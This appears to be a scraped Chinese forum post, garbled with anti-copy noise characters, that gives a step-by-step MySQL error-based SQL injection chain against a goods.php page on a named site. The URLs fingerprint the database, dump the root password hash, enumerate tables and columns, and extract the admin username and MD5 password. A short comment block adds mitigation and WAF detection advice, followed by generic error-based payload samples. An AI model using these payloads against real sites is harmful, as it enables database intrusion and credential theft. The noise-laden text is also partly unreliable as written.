判断版本号
4 j( Q% `% G; B. Y8 X- z0 S2 f: E$ Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* q0 b( {/ L) w, v. o: u
判断系统
! @8 {0 U9 c, P4 [4 u" `; H) S+ Z* T; h; u2 H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 r: y& b" V# D7 s
% I9 Y: r( W, C4 }6 v
. A: H$ t8 g8 A$ p" s- n+ V5 ], [
$ S5 n1 L6 d) r. H3 ^
当前 user()
6 _ ]. N1 w" b( x
! A, X8 l# [5 H" I& {& T+ F, Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 u9 Y% E* Y- p5 R2 _/ O+ [
7 S( J) J) A3 S% Q- c9 v7 ] ]7 q. q0 U: ]
当前 database()
; G: B: u$ r3 K6 a8 A; V0 Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& G j$ c; C8 H: B; J) [' d3 u- O
$ W7 F& z% V( |0 y* i8 L* A: s3 g8 O3 J9 s6 M5 m$ S$ _' t
?1 m4 e* V. g3 [! D7 j
root hash
6 \2 J5 a, ?8 g6 b$ N# h4 ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! s3 W3 n9 ], t4 }; K Y: j7 \
4 o0 q1 D$ [1 l1 h# r/ B9 G6 }! b
9 [! |, M2 a! S! i0 _
当前 数据库表名
- z; ~, ]' ]3 d& g, y$ Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ T$ g. N* Y6 {8 r2 x9 f. X
, }- y& W# v3 @ Z- F' o, Z% ^7 j5 l& h6 O8 x
当前 数据库 user_name 字段
5 _! f7 l/ x& o2 e- y% p" r9 Z+ lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 k( x5 ~% W' c- [4 D) v1 |
, C) {: {8 k5 k* J/ g
当前 数据库 字段 password
3 i$ P2 I0 R2 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 F `+ b; E# M0 F; f
4 H* ^6 e) D4 b# C# ^! @
4 d) f# o. ^/ T) z1 ^* v9 q, V: w {3 F; d: M2 i6 V7 |
获得 admin passwd(md5)
, F2 S- V/ E0 H" `/ X8 Y8 V% T! E+ K0 r7 e; F8 }0 L* S
( I% K+ u. v# I7 \) S0 Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ]' U- E% s5 s" p# b# t2 U5 O
; V8 R6 u/ K; O* ]$ K& X* r
报错注射
-- Error-based extraction samples (lines still carry forum anti-copy noise before
-- the SQL). Each one puts a selected value (version(), a username, a schema name)
-- into a GROUP BY key together with floor(rand(0)*2); the technique relies on the
-- server raising a duplicate-key error whose message echoes that value.
-- It only succeeds when the application interpolates `uid` into the SQL string
-- unparameterized AND returns raw database errors to the client.
-- Mitigation: bind `uid` as a parameter, replace raw DB errors with a generic
-- response and log them server-side, and run the app's DB account without read
-- access to information_schema / admin tables it does not need.
-- Detection: `information_schema`, `rand(0)`, `group by` or `union select`
-- arriving in a numeric parameter is a high-fidelity WAF / access-log signature.
) M& Y& [" b2 Z' x' z2 t/ SSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)( \5 M9 F. [( p3 j) i& ?
' | }6 \: W/ j [) [0 wSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 N( f" w* N! s7 U% |& k* j2 |
0 j( Q2 Q" L0 a& N* c" ?and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |